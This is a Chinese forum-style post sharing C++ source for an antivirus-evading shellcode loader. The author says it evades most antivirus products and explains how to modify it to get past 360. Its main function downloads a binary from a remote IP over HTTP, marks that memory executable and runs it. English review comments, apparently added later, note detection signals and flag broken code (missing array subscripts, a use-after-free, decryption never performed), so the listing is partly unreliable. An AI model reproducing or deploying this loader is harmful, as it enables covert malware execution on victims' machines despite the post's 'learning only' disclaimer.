免杀加载器C++代码源码
原理:加密URL 加密shellcode
解密URL 打开指定URL下载的bin二进制文件
读取bin中的数据,进行加密
申请一块内存,解密数据复制到内存中
执行内存中的shellcode
释放内存
(大概就是这些,刚做出来的时候,用了一个星期。360已经特征杀了,其他杀毒一直没报。很稳定,要过360的自己改改加密或者改改内存执行方式就可以过)
请勿用于非法活动!这个代码只仅供参考学习价值!否则后果自负!
换成o
#include <Windows.h>
#include <WinINet.h>
#include <Shlwapi.h>
#include <bcrypt.h>
#include <wincrypt.h>
#include <ntstatus.h>
#include <cctype>
#include <iomanip>
#include <iostream>
#include <sstream>
#include <string>
#include <vector>
#pragma comment(lib, "Wininet.lib")
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "Bcrypt.lib")
#ifndef STATUS_SUCCESS
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#endif
// Base64编码
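// Base64-encode a byte buffer (RFC 4648 standard alphabet, '=' padding).
//
// The listing as extracted had lost every array subscript in this function
// (`char_array_3 = byte;`, `ret += base64_chars];`), so it neither compiled nor
// described a single well-defined behaviour; this is a plain rewrite of the
// standard algorithm with the same signature.
//
// @param data  bytes to encode; an empty vector yields an empty string.
// @return      the encoded text, length 4 * ceil(data.size() / 3).
std::string base64_encode(const std::vector<BYTE>& data) {
    static const char kAlphabet[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    const size_t n = data.size();
    std::string out;
    out.reserve(((n + 2) / 3) * 4);  // exact final length, one allocation

    // Every full 3-byte group maps to four 6-bit symbols.
    size_t i = 0;
    while (i + 3 <= n) {
        const unsigned int triple = (static_cast<unsigned int>(data[i]) << 16) |
                                    (static_cast<unsigned int>(data[i + 1]) << 8) |
                                     static_cast<unsigned int>(data[i + 2]);
        out += kAlphabet[(triple >> 18) & 0x3f];
        out += kAlphabet[(triple >> 12) & 0x3f];
        out += kAlphabet[(triple >> 6) & 0x3f];
        out += kAlphabet[triple & 0x3f];
        i += 3;
    }

    // A trailing 1- or 2-byte group is zero-filled and the unused symbol
    // positions are written as '=' so decoders can recover the exact length.
    const size_t rem = n - i;
    if (rem > 0) {
        unsigned int triple = static_cast<unsigned int>(data[i]) << 16;
        if (rem == 2) {
            triple |= static_cast<unsigned int>(data[i + 1]) << 8;
        }
        out += kAlphabet[(triple >> 18) & 0x3f];
        out += kAlphabet[(triple >> 12) & 0x3f];
        out += (rem == 2) ? kAlphabet[(triple >> 6) & 0x3f] : '=';
        out += '=';
    }
    return out;
}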
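// Percent-encode `str` for use in a URL query (RFC 3986 style): the unreserved
// set (ALPHA / DIGIT / "-" / "_" / "." / "~") passes through unchanged, every
// other byte becomes "%XX" with upper-case hex digits.
//
// @param str  raw bytes to encode; treated as opaque octets, not as text.
// @return     the encoded string (empty input yields an empty string).
std::string url_encode(const std::string& str) {
    std::ostringstream escaped;
    escaped.fill('0');
    // Hex + uppercase can be set once: neither flag affects plain `char` output.
    escaped << std::hex << std::uppercase;
    for (const char c : str) {
        // Widen through unsigned char first: calling std::isalnum() with a
        // negative `char` (any byte >= 0x80 where char is signed) is undefined
        // behaviour, and the same value is what we want printed as %XX.
        const unsigned char uc = static_cast<unsigned char>(c);
        if (std::isalnum(uc) || c == '-' || c == '_' || c == '.' || c == '~') {
            escaped << c;
        } else {
            escaped << '%' << std::setw(2) << static_cast<int>(uc);
        }
    }
    return escaped.str();
}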
// Builds "<url>?param=<base64(AES(param))>&key=<base64(key)>" from the
// hard-coded plaintext "param=123456", using CNG (BCrypt) for the random key
// and for AES. Returns "" on any BCrypt failure. Not called from main() in this
// listing.
//
// NOTE(review): the text appears to have lost its array subscripts in
// extraction, exactly like base64_encode() above — `BYTE key = { 0 }` is a
// single byte handed to BCryptGenRandom as a buffer, and `new BYTE` is paired
// with `delete[]`. The original presumably read `BYTE key[N]` / `new BYTE[cb…]`;
// as written it does not compile, so the key length is unknown from here.
// NOTE(review): the random key is appended to the URL in the clear (`&key=`),
// so the AES step hides nothing from anyone who can see the URL; this is
// obfuscation, not confidentiality.
// NOTE(review): no chaining mode is set on hAlg and pbIV is NULL, so the
// provider's default (CBC) runs without a caller-supplied IV — presumably an
// all-zero IV; identical inputs therefore produce identical ciphertext.
std::string encrypt_url(const std::string& url) {
std::string param = "param=123456";
std::vector<BYTE> data(param.begin(), param.end());
// Key material from the CNG RNG provider; the handle is closed again before
// the same variable is reused for the AES provider.
BCRYPT_ALG_HANDLE hAlg = NULL;
if (BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_RNG_ALGORITHM, NULL, 0) != STATUS_SUCCESS) {
return "";
}
BYTE key = { 0 };
if (BCryptGenRandom(hAlg, key, sizeof(key), 0) != STATUS_SUCCESS) {
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
BCryptCloseAlgorithmProvider(hAlg, 0);
BCRYPT_KEY_HANDLE hKey = NULL;
if (BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0) != STATUS_SUCCESS) {
return "";
}
// cbKeyObject: size of the provider's opaque key object; cbBlockLen: AES block size.
ULONG cbKeyObject = 0, cbData = 0, cbBlockLen = 0;
if (BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, (PBYTE)&cbKeyObject, sizeof(ULONG), &cbData, 0) != STATUS_SUCCESS) {
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
if (BCryptGetProperty(hAlg, BCRYPT_BLOCK_LENGTH, (PBYTE)&cbBlockLen, sizeof(ULONG), &cbData, 0) != STATUS_SUCCESS) {
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
BYTE* pbKeyObject = new BYTE;
if (BCryptGenerateSymmetricKey(hAlg, &hKey, pbKeyObject, cbKeyObject, key, sizeof(key), 0) != STATUS_SUCCESS) {
delete[] pbKeyObject;
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
// NOTE(review): use-after-free — CNG requires the key-object buffer passed to
// BCryptGenerateSymmetricKey to stay allocated until BCryptDestroyKey, but it
// is freed here while hKey is still used by BCryptEncrypt below.
delete[] pbKeyObject;
// Pad to a whole block, PKCS#7 style (pad byte value == pad length).
// `padding` is always in 1..cbBlockLen, so the `> 0` test cannot fail.
size_t padding = cbBlockLen - (data.size() % cbBlockLen);
if (padding > 0) {
data.resize(data.size() + padding, (BYTE)padding);
}
// Encrypt; the output buffer is one block larger than the (already padded)
// input, and cbData receives the number of bytes actually written.
ULONG cbCipherText = (ULONG)data.size() + cbBlockLen;
BYTE* pbCipherText = new BYTE;
memset(pbCipherText, 0, cbCipherText);
if (BCryptEncrypt(hKey, data.data(), (ULONG)data.size(), NULL, NULL, 0, pbCipherText, cbCipherText, &cbData, 0) != STATUS_SUCCESS) {
delete[] pbCipherText;
BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
// Base64- then URL-encode both the key and the ciphertext, and splice them in
// as "param=<ciphertext>&key=<key>" (the "param=" prefix is reused from `param`).
std::string encoded_key = base64_encode(std::vector<BYTE>(key, key + sizeof(key)));
std::string encoded_data = base64_encode(std::vector<BYTE>(pbCipherText, pbCipherText + cbData));
std::string encoded_url = url + "?" + param.substr(0, param.find("=") + 1) + url_encode(encoded_data) + "&key=" + url_encode(encoded_key);
// Release the ciphertext buffer.
delete[] pbCipherText;
return encoded_url;
}
// Entry point of the loader. Sequence: open a WinINet session, fetch `url`
// over plain HTTP, read the whole response body into a freshly VirtualAlloc'ed
// PAGE_READWRITE region, flip that region to PAGE_EXECUTE_READ with
// VirtualProtect, and call its first byte as a `void()` function. Nothing in
// this listing decrypts the download or calls encrypt_url()/base64_encode();
// despite the description above the code, the payload is fetched and run as-is.
//
// Detection notes: the observable chain is WinINet network I/O written into a
// private, non-image memory region, a RW -> RX VirtualProtect transition on
// that same region, and an indirect call into it. The downloaded bytes are
// never authenticated (no signature, hash, or size check beyond the server's
// Content-Length header), so whoever controls the host at `url` or the HTTP
// path controls this process.
//
// Returns 0 only if the downloaded code itself returns; 1 on any API failure.
int main() {
std::wstring url = L"http://xxx.92.32.137/Client.bin";
HINTERNET hInternet = InternetOpenW(L"Download", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if (hInternet == NULL) {
std::cout << "Failed to initialize WinINet." << std::endl;
return 1;
}
// Flags force a fresh fetch and keep the body out of the WinINet cache.
HINTERNET hUrl = InternetOpenUrlW(hInternet, url.c_str(), NULL, 0, INTERNET_FLAG_RELOAD | INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_NO_CACHE_WRITE, 0);
if (hUrl == NULL) {
std::cout << "Failed to open URL." << std::endl;
InternetCloseHandle(hInternet);
return 1;
}
// The server-supplied Content-Length decides the allocation size below.
DWORD file_size = 0;
DWORD length = sizeof(file_size);
if (!HttpQueryInfoW(hUrl, HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER, &file_size, &length, NULL)) {
std::cout << "Failed to get file size." << std::endl;
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return 1;
}
// Fresh private region, writable but not yet executable.
LPVOID lpAddress = VirtualAlloc(NULL, file_size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (lpAddress == NULL) {
std::cout << "Failed to allocate memory." << std::endl;
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return 1;
}
// Single read of the body straight into the allocation.
DWORD bytes_read = 0;
if (!InternetReadFile(hUrl, lpAddress, file_size, &bytes_read)) {
std::cout << "Failed to read file." << std::endl;
VirtualFree(lpAddress, 0, MEM_RELEASE);
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return 1;
}
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
// Make the page executable via VirtualProtect (RW -> RX transition on a
// non-image region: the classic memory-scanner / ETW signal for this pattern).
DWORD old_protect = 0;
if (!VirtualProtect(lpAddress, file_size, PAGE_EXECUTE_READ, &old_protect)) {
std::cout << "Failed to set memory page protection." << std::endl;
VirtualFree(lpAddress, 0, MEM_RELEASE);
return 1;
}
// Transfer control to the downloaded bytes; execution only comes back here
// if that code returns.
((void(*)())lpAddress)();
// Free the memory.
VirtualFree(lpAddress, 0, MEM_RELEASE);
return 0;
}